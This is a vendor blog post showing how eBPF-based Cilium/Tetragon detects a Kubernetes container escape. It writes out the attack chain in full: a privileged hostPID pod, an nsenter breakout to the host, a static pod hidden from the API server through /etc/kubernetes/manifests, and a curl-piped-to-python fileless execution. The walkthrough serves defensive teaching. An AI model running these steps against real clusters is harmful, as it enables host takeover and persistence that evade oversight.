Detecting a Container Escape with Tetragon and eBPF

News: Tetragon has reached 1.0!

Tetragon (referred to as Cilium in this article) has hit the 1.0 OSS milestone!

If you run Cloud Native Workloads, you better secure them. After all, services are often exposed to the public and Workloads might belong to various tenants. In this blog post we will show you how an attacker with access to your Kubernetes cluster could do a container escape: running a pod to gain root privileges, escaping the pod onto the host, and persisting the attack with invisible pods and fileless executions. And we will show you how to detect these attacks with Isovalent Cilium Enterprise.

The Problem

During a container escape an attacker breaks the isolation boundary between the host and the container, ending up escaping into what is eventually a Kubernetes control plane or a worker node. In this case, the attackers can see other containers that are running on the same host, gather their secrets, read or write data on the host file system, attack kubelet and escalate privileges; or exploit a Kubernetes bug and persist in the environment by deploying an invisible pod.

Applying security best practises on a Kubernetes environment can limit these types of attacks but a container breakout is still possible, an attacker can use a privileged pod or exploit an existing vulnerability to gain privileges. Security Teams need to measure if hardening configurations are suitable and applied protections are working.

Solution

One way to achieve this is observability following a data-driven approach: collect data from Kubernetes workloads and hosts, observe feedback, and make continuous data-driven decisions to protect the Kubernetes environment.

By using eBPF, Security Teams can get unique visibility directly into any Kubernetes workloads, such as pods. Because pods on a Kubernetes node share a single kernel, each of the processes within a pod are visible to a single eBPF program. This can provide full visibility into each process running on a node whether they are long running processes on the host managed by systemd or short lived processes running inside of containers.

Cilium

Cilium uses eBPF to very efficiently monitor all network and process behaviour inside of Kubernetes workloads and outside on the host and gives you Kubernetes Identity Aware and OS Level Process Visibility into those behaviours.

Cilium deploys as a daemonset inside of a Kubernetes environment. So, there is a Cilium agent running on each Kubernetes node and it is communicating with the Kubernetes API server to understand Kubernetes Pod Identities, Network Policies, Services etc. Then based on the identity of each one of the workloads deployed inside of a Kubernetes environment, Cilium installs a highly efficient eBPF program to do Connectivity, Observability and Security for those workloads.

Rich Security Events

Cilium is both able to observe and enforce what behaviour happened inside of a Linux system. It can collect and filter out Security Observability data directly in the kernel and export it to user space as JSON events and / or store them in a specific log file via a Daemonset called hubble-enterprise. These JSON events are enriched with Kubernetes Identity Aware Information including services, labels, namespaces, pods and containers and with OS Level Process Visibility data including process binaries, pids, uids, parent binaries with the full Process Ancestry Tree. These events can then be exported in a variety of formats and sent to external systems such as a SIEM, e.g: Elasticsearch, Splunk or stored in an S3 bucket. For simplicity, in this blog post they will be directly consumed from the log file.

By leveraging this real-time time Network and Process-Level Visibility Data from the kernel via Cilium, Security Teams are able to see all the processes that have been executed in their Kubernetes environment which helps them to make continuous data driven decisions and improve the security posture of their system. One such example is detecting a container escape.

Let’s reach the host namespace

In this example, we are using a privileged pod with host namespace configuration to represent a container escape attack. This is possible in a hardened Kubernetes environment, as we demonstrate it here. Note, that there are multiple ways to perform a breakout, for example an attacker can exploit a vulnerability as well to gain privileges and escape out of the container sandbox.

The problem: attackers can launch privileged pods to access host resources

The first and easiest step for an attacker to perform a container escape would be to spin up a pod with a privileged Pod spec. Note: Kubernetes allows this by default and the privileged flag grants the container all available kernel capabilities. The hostPID and hostNetwork flag places the container into the host PID and networking namespace, so it can see and interact with all process and network resources. One easy example can be found in the following yaml file:

$ cat privileged.yaml

apiVersion: v1
kind: Pod
metadata:
  name: privileged-the-pod
spec:
  hostPID: true
  hostNetwork: true
  containers:
  - name: privileged-the-pod
    image: nginx:latest
    ports:
    - containerPort: 80
    securityContext:
      privileged: true

So, let’s apply that privileged Pod spec:

$ kubectl apply -f privileged.yaml
pod/privileged-the-pod created

$ kubectl get pods
NAME                 READY   STATUS    RESTARTS   AGE
privileged-the-pod   1/1     Running   0          11s

Now, the attacker has a privileged pod up and running which gives them the same permissions as they would have if they were root on the underlying node. Why is it so powerful? Because of the capabilities that the pod has started with, including CAP_SYS_ADMIN, which is essentially the “new root” in Linux and also gives access to all devices on the host machine. This capability in combination with HostPID gives the attacker access to breaking out of all container namespaces put in place, so they can interact with and exploit any other process or filesystem on the underlying node where the privileged pod is deployed.

By using Cilium, Security Teams can detect any privileged container execution by picking up the following process_exec event exported to userspace by executing the following command:

kubectl logs -n kube-system ds/hubble-enterprise -c export-stdout

Secondly, they can see the related:

Kubernetes Identity Aware Information, such as the namespace: default, the pod name: privileged-the-pod, the container-id and the label
OS Level Visibility Information, such as the binary: /docker-entrypoint.sh, pid: 23715, uid: 0 and the arguments: nginx -g \"daemon off;
Full Process Ancestry Tree which includes /usr/bin/containerd-shim as a direct parent process binary
Capabilities that the container has started which includes CAP_NET_RAW and CAP_SYS_ADMIN

As a second step, the attacker can use kubectl exec to get shell access to privileged-the-pod:

kubectl exec -it privileged-the-pod -- /bin/bash
root@minikube:/#

A shell suddenly popping up in a container log after it was started is of course an event the Security Team is interested in. They can detect the bash execution by picking up the following process_exec event exported to userspace via Cilium. The Process Information can be seen between line 4 and 11 while the Kubernetes Identity Aware Information can be seen between line 12 and 24.

As a third step, the attacker can use the nsenter command to enter into the host namespace and run the bash command as root on the host.

root@minikube:/# nsenter -t 1 -a bash
bash-5.0#

The nsenter command executes commands in specified namespaces. The first flag, -t defines the target namespace where the attacker wants to go. Every Linux machine runs a process with PID 1 which always runs in the host namespace. The other command line arguments define the other namespaces where the attacker also wants to enter, in this case, -a describes all the namespaces.

So, the attacker is breaking out from the container in every possible way and running the bash command as root on the host.

Security Teams can identify this breakout by picking up two process_exec events. In the first event, they are able to observe the executed nsenter command in line 8 with the appropriate namespace arguments -t 1 -a in line 9. They can also see the source pod name in line 15, which is privileged-the-pod and all the Kubernetes Identity Aware and OS Level Visibility Information:

By picking up the second process_exec event, Security Teams are able to detect the bash execution on the host namespace having nsenter as a parent process binary. The Parent Process Information can be seen between line 151 and 177 and the source binary name can be seen in line 8, which is /usr/bin/bash:

Now, the attacker has reached the host namespace on a node in a Kubernetes cluster and is running bash. We have used a privileged container with hostPID associations in this example. In the real world, this could also have been an unprivileged container with its own process namespace that then managed to exploit a kernel vulnerability to gain privileges and break out. What can they do? The attacker can see containers that are running on the same controller node, gather secrets associated with them, read data from the host file system, attack kubelet and escalate privileges; or exploit a special Kubernetes behavior and persist the breakout by firing up an invisible container. Let’s assume the attacker chooses the last option.

Container where are you?

Persist the break out by creating an invisible container by the Kubernetes API server

Apart from stealing sensitive information from other Kubernetes workloads, peaking into other Kubernetes namespaces, the attacker can persist the breakout by starting a “hidden”, static pod.

There are many ways an attacker could create a persistent process to hide traces of further activities. For this example, we are going to use a static Kubernetes pod. Unfortunately, many Security Teams make the assumption that every time kubelet launches a workload all the configs have been statically analyzed by the Kubernetes API server and its webhooks. They don’t take into account that if an attacker inserts a Pod spec under the /etc/kubernetes/manifests directory on a kubeadm managed cluster, kubelet will automatically launch the pod without notifying the Kubernetes API server about it.

How a container can be hidden from the K8s API

To persist the breakout, the attacker can go to the /etc/kubernetes/manifests directory on the controller node, since they have access to all the resources and take a look at what is there:

bash-5.0# cd /etc/kubernetes/manifests/
bash-5.0# ls -l
total 20
-rw------- 1 root root 2289 Oct 13 12:40 etcd.yaml
-rw------- 1 root root 3595 Oct 13 12:40 kube-apiserver.yaml
-rw------- 1 root root 2895 Oct 13 12:40 kube-controller-manager.yaml
-rw------- 1 root root 1385 Oct 13 12:40 kube-scheduler.yaml

As a next step, the attacker can insert a Pod spec named hack-latest.yaml with a namespace that doesn’t exist (namespace: doesnt-exist). This way the pod will be picked up by kubelet by default and will be still invisible for the Kubernetes API server.

bash-5.0# cat << EOF > hack-latest.yaml
> apiVersion: v1
> kind: Pod
> metadata:
>   name: hack-latest
>   hostNetwork: true
>   # define in namespace that doesn't exist so
>   # workload is invisible to the API server
>   namespace: doesnt-exist
> spec:
>   containers:
>   - name: hack-latest
>     image: sublimino/hack:latest
>     command: ["/bin/sh"]
>     args: ["-c", "while true; do sleep 10;done"]
>     securityContext:
>       privileged: true
>   # Define the control plane node the privileged pod
>   # will be scheduled to
>   nodeName: kind-control-plane
> EOF

As a validation, the attacker can firstly run crictl ps and see that the container is running on the controller node. The following bash snippet shows that the hack-latest container is up and running with the following docker id cc7f47efbbfee:

bash-5.0# crictl ps
CONTAINER        IMAGE                                                                                      CREATED              STATE      NAME                      ATTEMPT             POD ID
cc7f47efbbfee    sublimino/hack@sha256:569f3fd3a626a4cfd50e4556425216a5b8ab3d8bf9476c1b1c615b83ffe4000a     About a minute ago   Running    hack-latest               0                   895972101d32b
e083d7868b7ff    cilium/json-mock@sha256:d8797011275f12c0a22d308227364493954c9e07e21c96c7caf6cf50b892d638   19 minutes ago       Running    frontend-service          0                   31260e2cd0dc8
a025e4319f354    cilium/json-mock@sha256:d8797011275f12c0a22d308227364493954c9e07e21c96c7caf6cf50b892d638   19 minutes ago       Running    backend-service           0                   a455f019f215b
...

Secondly, the attacker can run kubectl get pods --all-namespaces outside from the controller node, which shows that the hack-latest container is completely invisible for the Kubernetes API server in the following bash snippet:

$ kubectl get pods --all-namespaces
NAMESPACE     NAME                               READY   STATUS    RESTARTS   AGE
default       privileged-the-pod                 1/1     Running   0          51m
kube-system   cilium-n8wtg                       1/1     Running   0          75m
kube-system   cilium-operator-65fcccb665-7vwjh   0/1     Pending   0          75m
kube-system   cilium-operator-65fcccb665-bbfph   1/1     Running   0          75m
kube-system   coredns-558bd4d5db-hvvph           1/1     Running   0          75m
kube-system   etcd-minikube                      1/1     Running   0          76m
kube-system   hubble-enterprise-jrl56            2/2     Running   0          55m
kube-system   hubble-relay-8676fb6fdc-r4285      1/1     Running   0          75m
kube-system   hubble-ui-7f6d94945b-mtffv         3/3     Running   0          75m
kube-system   kube-apiserver-minikube            1/1     Running   0          76m
kube-system   kube-controller-manager-minikube   1/1     Running   0          76m
kube-system   kube-proxy-m958t                   1/1     Running   0          76m
kube-system   kube-scheduler-minikube            1/1     Running   0          76m
kube-system   storage-provisioner                1/1     Running   1          76m

With Cilium Security Teams can follow the attacker’s move until creating the invisible container by picking up the following exporter process_exec events.

The first event shows the hack-latest.yaml Pod spec insertion under the /etc/kubernetes/manifests/ directory. The source binary can be seen in line 8 while the current working directory is shown in line 7.

By detecting the second process_exec event, Security Teams are able to pick up the invisible hack-latest container execution having the source binary in line 8 and the arguments in line 9.

Execute a malicious python script in memory

Now that the attacker has actually persisted the breakout by spinning up an invisible container, they can download and execute a malicious script in memory that never touches disk. Note that this simple python script can be a fileless malware which is almost impossible to detect by using traditional userspace tools.

As a first step, the attacker can docker exec into the invisible container hack-latest:

bash-5.0# docker exec -it cc7f47efbbfee /bin/bash
PRETTY_NAME="Alpine Linux v3.12"
root@minikube:~

Then they download a malicious python script and execute it in memory:

root@minikube:~ [1]# curl https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py | python
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   488  100   488    0     0   1574      0 --:--:-- --:--:-- --:--:--  1574

With Cilium Security Teams are able to follow the attacker’s movement by using the power of the kernel and gain real-time visibility into the memory of the processes, network connections and observe system access.

They can pick up the following process_exec events. With the first event, they are able to see the bash execution in a container with a docker id of cc7f47efbbfee, which is the invisible hack-latest container. The docker id can be seen in line 12, meanwhile the source binary can be seen in line 8.

In the second process_exec event Security Teams are able to observe the sensitive curl command in line 8 with the following arguments https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py in line 9:

With the third process_connect event, Security Teams are also be able to pick up the sensitive socket connection opened via curl with the following arguments https://raw.githubusercontent.com/realpython/python-scripts/master/scripts/18_zipper.py and with the following destination IP 185.199.110.133 and port 443. The Source and Destination Address Information can be found between line 29 and 32, meanwhile the Process Information can be found between line 4 and 14.

Lastly, with the fourth process_exec event, Security Teams are able to pick up the malicious python script execution in memory. The cc7f47efbbfee2ff38382d32 docker id of the container can be seen in line 12 while the /usr/bin/python source binary can be seen in line 8:

Conclusion

Securing a Kubernetes environment can be challenging. Measuring the current state of the security posture in your Kubernetes environment requires Observability. Security Teams need to start collecting the right data to be able to detect a sophisticated attack, like a container escape that occurs within a Kubernetes environment.

The container escape attack that was covered in this blog post included simple but effective steps proving that Security Teams need Observability and the ability to Measure the data to be able to detect those steps.

By leveraging the Observability of Isovalent Cilium Enterprise, they can detect behaviours that are outside of the security posture of their environment.

This becomes possible by the superpower of eBPF and Cilium.

Next steps

If you want to learn more about Isovalent Cilium Enterprise, the open source project Cilium or the underlying technology eBPF, join us for an “Ask Me Anything” with one of our technical experts:

Also make sure to check out:

About Isovalent

Isovalent is the company founded by the creators of Cilium and eBPF. Isovalent builds open-source software and enterprise solutions solving networking, security, and observability needs for modern cloud native infrastructure. The flagship technology Cilium is the choice of leading global organizations including Adobe, AWS, Capital One, Datadog, GitLab, Google, and many more. Isovalent is headquartered in Mountain View, CA and is backed by Andreessen Horowitz, Google and Cisco Investments. To learn more, visit isovalent.com or follow @isovalent.